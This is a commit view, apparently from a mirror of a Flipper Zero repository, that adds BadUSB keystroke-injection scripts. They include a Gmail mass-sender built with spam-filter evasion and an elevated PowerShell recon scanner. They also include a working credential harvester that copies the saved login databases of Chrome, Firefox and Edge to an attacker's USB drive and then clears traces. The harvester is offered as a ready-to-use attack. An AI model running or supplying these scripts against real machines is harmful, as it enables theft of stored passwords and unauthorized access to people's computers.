mirror of
https://github.com/UberGuidoZ/Flipper.git
synced 2024-12-22 14:30:21 +00:00
commit
86de7d9a9b
42
BadUSB/BadUSB-MarkCyber/Emails/EmailSender.txt
Normal file
42
BadUSB/BadUSB-MarkCyber/Emails/EmailSender.txt
Normal file
@ -0,0 +1,42 @@
|
|||||||
|
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%% This script is intended to send an email via badUSB (into your logged in gmail on chrome) %%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%% This script will open chrome, send an email, and then close chrome. Must be logged in to email %%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%% You can use python to replicate this script by changing email addresses & name every time %%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%% The python script in section 2.1 generates badusb scripts for multiple emails if need be %%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||||
|
DELAY 1000
|
||||||
|
GUI r
|
||||||
|
DELAY 500
|
||||||
|
STRING chrome
|
||||||
|
ENTER
|
||||||
|
DELAY 1000
|
||||||
|
STRING https://mail.google.com/mail/u/0/#inbox?compose=new
|
||||||
|
ENTER
|
||||||
|
DELAY 5000
|
||||||
|
DELAY 1000
|
||||||
|
STRING {EMAIL ADDRESS YOU WANT TO SEND EMAIL TO}
|
||||||
|
DELAY 500
|
||||||
|
TAB
|
||||||
|
TAB
|
||||||
|
STRING {YOUR SUBJECT NAME}
|
||||||
|
TAB
|
||||||
|
STRING Hi {THEIR NAME}
|
||||||
|
ENTER
|
||||||
|
ENTER
|
||||||
|
STRING {CONTENTS OF THE EMAIL}
|
||||||
|
ENTER
|
||||||
|
ENTER
|
||||||
|
STRING {IF YOU WANT A SECOND PARAGRAPH, THIS IS WHAT DOUBLE-ENTER ABOVE DOES}
|
||||||
|
ENTER
|
||||||
|
ENTER
|
||||||
|
STRING Respectfully,
|
||||||
|
ENTER
|
||||||
|
ENTER
|
||||||
|
STRING {YOUR NAME}
|
||||||
|
ENTER
|
||||||
|
CTRL ENTER
|
||||||
|
DELAY 5000
|
||||||
|
DELAY 1000
|
||||||
|
ALT F4
|
||||||
|
REM check out github.com/markcyber for more scripts
|
101
BadUSB/BadUSB-MarkCyber/Emails/GenerateEmailScripts.py
Normal file
101
BadUSB/BadUSB-MarkCyber/Emails/GenerateEmailScripts.py
Normal file
@ -0,0 +1,101 @@
|
|||||||
|
#######################################################################################################################################
|
||||||
|
#######################################################################################################################################
|
||||||
|
################# This script was created by github.com/MarkCyber (w/ assistance of ai) ####################
|
||||||
|
################# This is a python script to automatically create BadUSB scripts to auto send emails ####################
|
||||||
|
################# This takes a excel sheet with the columns named "Names" and "Emails" ####################
|
||||||
|
################# This script will then make a badusb script using the name + email of each person ####################
|
||||||
|
################# There are various subject options that will be chosen from, to minimize "spam" ####################
|
||||||
|
################# Change the signature to your name, and put subject options that fit your email ####################
|
||||||
|
################# Lastly, of course make sure to change the contents of the email to what you want ####################
|
||||||
|
#######################################################################################################################################
|
||||||
|
#######################################################################################################################################
|
||||||
|
|
||||||
|
import pandas as pd
|
||||||
|
import random
|
||||||
|
|
||||||
|
# Load the Excel file, make sure it has the same name (or change the name in this script)
|
||||||
|
file_path = 'NameAndEmails.xlsx'
|
||||||
|
data_df = pd.read_excel(file_path)
|
||||||
|
|
||||||
|
# Your excel should have 2 columns. Names, and Emails.
|
||||||
|
data_cleaned_df = data_df[['Names', 'Emails']].dropna().reset_index(drop=True)
|
||||||
|
data_cleaned_df.columns = ['Name', 'Email']
|
||||||
|
|
||||||
|
# List of placeholder subject options. Change these to 7 similar subjects that match your email (if you are sending many. You can use the same if not)
|
||||||
|
subject_options = [
|
||||||
|
"Placeholder for subject option 1",
|
||||||
|
"Placeholder for subject option 2",
|
||||||
|
"Placeholder for subject option 3",
|
||||||
|
"Placeholder for subject option 4",
|
||||||
|
"Placeholder for subject option 5",
|
||||||
|
"Placeholder for subject option 6",
|
||||||
|
"Placeholder for subject option 7"
|
||||||
|
]
|
||||||
|
|
||||||
|
# Placeholder for email body template. The name field will be filled from the "names" section in the excel sheet you provided.
|
||||||
|
# Just modify the actual email body and sender name to fit your needs
|
||||||
|
email_body_template = """
|
||||||
|
Hi {name},
|
||||||
|
|
||||||
|
Placeholder for email body.
|
||||||
|
|
||||||
|
Warm Regards,
|
||||||
|
Sender Name
|
||||||
|
"""
|
||||||
|
|
||||||
|
# Function to generate BadUSB script
|
||||||
|
def generate_badusb_script_with_placeholders_single_file(data_df):
|
||||||
|
script_template = [
|
||||||
|
"DELAY 1000",
|
||||||
|
"GUI r",
|
||||||
|
"DELAY 500",
|
||||||
|
"STRING chrome",
|
||||||
|
"ENTER",
|
||||||
|
"DELAY 1000",
|
||||||
|
"STRING https://mail.google.com/mail/u/0/#inbox?compose=new", # In chrome it opens gmail to compose an email. This is why you must be logged in.
|
||||||
|
"ENTER",
|
||||||
|
"DELAY 5000"
|
||||||
|
]
|
||||||
|
|
||||||
|
scripts = script_template
|
||||||
|
|
||||||
|
for index, row in data_df.iterrows():
|
||||||
|
name = row['Name']
|
||||||
|
email = row['Email']
|
||||||
|
subject = random.choice(subject_options)
|
||||||
|
random_delay = random.randint(10000, 25000)
|
||||||
|
|
||||||
|
email_body_lines = email_body_template.format(name=name).strip().split('\n')
|
||||||
|
email_body_lines = [f"STRING {line.strip()}" for line in email_body_lines if line.strip()]
|
||||||
|
|
||||||
|
email_script = [
|
||||||
|
"DELAY 1000",
|
||||||
|
f"STRING {email}",
|
||||||
|
"DELAY 500",
|
||||||
|
"TAB",
|
||||||
|
"TAB",
|
||||||
|
f"STRING {subject}",
|
||||||
|
"TAB"
|
||||||
|
] + email_body_lines + [
|
||||||
|
"ENTER",
|
||||||
|
"CONTROL ENTER",
|
||||||
|
"DELAY 5000",
|
||||||
|
f"DELAY {random_delay}", #random delay so emails are not sent at the sames, ideally minimizing the potential to be marked as spam
|
||||||
|
"ALT F4"
|
||||||
|
]
|
||||||
|
|
||||||
|
scripts += email_script
|
||||||
|
|
||||||
|
return "\n".join(scripts)
|
||||||
|
|
||||||
|
# Generate the BadUSB script with placeholders and proper send command in a single file
|
||||||
|
final_script_with_placeholders = generate_badusb_script_with_placeholders_single_file(data_cleaned_df)
|
||||||
|
|
||||||
|
# Save the script to a file
|
||||||
|
final_script_file_path = 'final_script_with_placeholders.txt' #This would be your badusb script
|
||||||
|
with open(final_script_file_path, 'w') as file:
|
||||||
|
file.write(final_script_with_placeholders)
|
||||||
|
|
||||||
|
print(f"Script saved to {final_script_file_path}")
|
||||||
|
|
||||||
|
#check out github.com/markcyber for more badusb / pen testing / automation tools and scripts
|
54
BadUSB/BadUSB-MarkCyber/HackStuff/CredentialHarvester.txt
Normal file
54
BadUSB/BadUSB-MarkCyber/HackStuff/CredentialHarvester.txt
Normal file
@ -0,0 +1,54 @@
|
|||||||
|
REM ##################################################################################################################
|
||||||
|
REM ############## This script was created by github.com/markcyber ##############
|
||||||
|
REM ############## This script requires a secondary USB named "MYUSB" to save credentials to ##############
|
||||||
|
REM ############## The extracted data will require decryption ##############
|
||||||
|
REM ##################################################################################################################
|
||||||
|
REM Open PowerShell
|
||||||
|
DELAY 1000
|
||||||
|
GUI r
|
||||||
|
DELAY 500
|
||||||
|
STRING powershell
|
||||||
|
DELAY 500
|
||||||
|
ENTER
|
||||||
|
DELAY 1000
|
||||||
|
REM Check if the USB drive exists
|
||||||
|
STRING $usbDrive = Get-WmiObject Win32_Volume | ? { $_.Label -eq 'MYUSB' } | Select -ExpandProperty DriveLetter;
|
||||||
|
STRING if ($usbDrive -ne $null) {
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
STRING cd $usbDrive;
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
STRING mkdir BrowserData;
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
STRING cd BrowserData;
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
REM Copy Chrome Login Data to USB
|
||||||
|
STRING $chromePath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data";
|
||||||
|
STRING if (Test-Path $chromePath) { Copy-Item $chromePath "$usbDrive\BrowserData\ChromeLoginData"; }
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
REM Copy Firefox Login Data to USB
|
||||||
|
STRING $firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\";
|
||||||
|
STRING if (Test-Path $firefoxPath) { Copy-Item $firefoxPath -Recurse "$usbDrive\BrowserData\FirefoxData"; }
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
REM Copy Edge Login Data to USB
|
||||||
|
STRING $edgePath = "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Login Data";
|
||||||
|
STRING if (Test-Path $edgePath) { Copy-Item $edgePath "$usbDrive\BrowserData\EdgeLoginData"; }
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
STRING }
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
REM Clear the clipboard to remove any sensitive data (This is not necessary, unless you did something on target PC)
|
||||||
|
STRING echo off | clip
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
REM Close PowerShell
|
||||||
|
STRING exit
|
||||||
|
ENTER
|
||||||
|
DELAY 500
|
||||||
|
REM Check out Github.com/MarkCyber for more badusb scripts and other hacky stuff
|
630
BadUSB/BadUSB-MarkCyber/HackStuff/VulnerabilityScanner.txt
Normal file
630
BadUSB/BadUSB-MarkCyber/HackStuff/VulnerabilityScanner.txt
Normal file
@ -0,0 +1,630 @@
|
|||||||
|
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%%% This script acts as a plug-in vulnerability scanner. Only use with permission %%%%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%%% This will require a secondary USB named as "MYUSB" to save all information onto %%%%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%%% This will find information on the following and save results in a results.txt file %%%%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%%% Info on: password policy, audit services, network settings, softwares and versions, CVEs %%%%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%%% Info on: open ports, firewall status, antivirus status, smbv1 status, missing updates & more %%%%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||||
|
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
|
||||||
|
DELAY 1000
|
||||||
|
REM Open Start Menu
|
||||||
|
CONTROL ESCAPE
|
||||||
|
DELAY 2000
|
||||||
|
STRING powershell
|
||||||
|
REM Navigate to the context menu to run PowerShell as an administrator
|
||||||
|
DELAY 500
|
||||||
|
RIGHTARROW
|
||||||
|
DELAY 100
|
||||||
|
DOWNARROW
|
||||||
|
DELAY 100
|
||||||
|
ENTER
|
||||||
|
DELAY 3000
|
||||||
|
ALT Y
|
||||||
|
DELAY 5000
|
||||||
|
REM Set PowerShell Execution Policy to Bypass
|
||||||
|
DELAY 1000
|
||||||
|
STRING set-executionpolicy bypass -scope process -force
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
REM Create the PowerShell script in memory and execute it
|
||||||
|
DELAY 200
|
||||||
|
STRING $usbName = "MYUSB"
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING $usbDrive = Get-WmiObject Win32_Volume | Where-Object { $_.Label -eq $usbName } | Select-Object -ExpandProperty DriveLetter
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING if ($usbDrive) {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING $owner = (Get-WmiObject Win32_ComputerSystem).UserName
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING $directoryPath = Join-Path -Path $usbDrive -ChildPath $owner
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING New-Item -ItemType Directory -Path $directoryPath
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING $resultsFilePath = Join-Path -Path $directoryPath -ChildPath "results.txt"
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING "" > $resultsFilePath
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING function check-passwordpolicy {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING try {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING net accounts
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING } catch {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING write-output "Error checking password policy: $_"
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING function audit-services {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING try {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING get-service | select-object name, displayname, status, starttype
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING } catch {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING write-output "Error auditing services: $_"
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING function check-networksettings {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING try {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING get-netipconfiguration
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING } catch {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING write-output "Error checking network settings: $_"
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING function check-softwarevulnerabilities {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING try {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING get-itemproperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | select-object displayname, displayversion, publisher
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING } catch {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING write-output "Error checking software vulnerabilities: $_"
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING function check-cve {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING param (
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING [string]$productname,
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING [string]$version
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING )
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING $initialDelay = 2
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING try {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING $uri = "https://services.nvd.nist.gov/rest/json/cves/1.0?keyword=$productname+$version"
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING start-sleep -seconds $initialDelay
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING $response = invoke-restmethod -uri $uri -method get
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING if ($response.totalresults -gt 0) {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING foreach ($cve in $response.result.cve_items) {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING "$($cve.cve.cve_data_meta.id) - $($cve.cve.description.description_data[0].value)"
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING } else {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING "no cves found for $productname $version"
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING } catch {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING write-output "Error checking CVEs: $_"
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING if ($_.Exception -match '403') {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING write-output "403 Forbidden error encountered. Retrying in 60 seconds..."
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING start-sleep -seconds 60
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING $retryResponse = invoke-restmethod -uri $uri -method get
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING if ($retryResponse.totalresults -gt 0) {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING foreach ($cve in $retryResponse.result.cve_items) {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING "$($cve.cve.cve_data_meta.id) - $($cve.cve.description.description_data[0].value)"
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING } else {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING "no cves found for $productname $version"
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING function analyze-logs {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING try {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING get-eventlog -logname system -newest 100
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING } catch {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING write-output "Error analyzing logs: $_"
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING function check-openports {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING try {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING netstat -an
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING } catch {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING write-output "Error checking open ports: $_"
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING function check-missingupdates {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING try {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING write-output "Checking Windows Update logs..."
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING $updateLogPath = Join-Path -Path $directoryPath -ChildPath "WindowsUpdate.log"
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING Get-WindowsUpdateLog -LogPath $updateLogPath
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING write-output "WindowsUpdate.log written to $updateLogPath"
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING Remove-Item -Path "C:\Users\$env:USERNAME\AppData\Local\Temp\WindowsUpdateLog\*" -Recurse -Force
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING } catch {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING write-output "Error getting Windows Update log: $_"
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING function check-firewallstatus {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING try {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING netsh advfirewall show allprofiles
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING } catch {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING write-output "Error checking firewall status: $_"
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING function check-smbv1status {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING try {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING get-windowsoptionalfeature -online -featurename smb1protocol
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING } catch {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING write-output "Error checking SMBv1 status: $_"
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING function check-antivirusstatus {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING try {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING get-mpcomputerstatus
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING } catch {
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING write-output "Error checking antivirus status: $_"
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING }
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING check-passwordpolicy >> $resultsFilePath
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING audit-services >> $resultsFilePath
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING check-networksettings >> $resultsFilePath
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING check-softwarevulnerabilities >> $resultsFilePath
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING analyze-logs >> $resultsFilePath
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING check-openports >> $resultsFilePath
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING check-missingupdates >> $resultsFilePath
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING check-firewallstatus >> $resultsFilePath
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING check-smbv1status >> $resultsFilePath
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING check-antivirusstatus >> $resultsFilePath
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
REM Dynamically identify critical software from running processes and scheduled tasks
|
||||||
|
STRING $runningSoftware = Get-Process | Select-Object Name | Sort-Object Name -Unique
|
||||||
|
DELAY 200
|
||||||
|
ENTER
|
||||||
|
DELAY 200
|
||||||
|
STRING $scheduledTasks = schtasks /query /fo CSV | ConvertFrom-Csv | Select-Object TaskName, TaskToRun | Sort-Object TaskToRun -Unique
|
||||||
|
DELAY 200
|
||||||
|
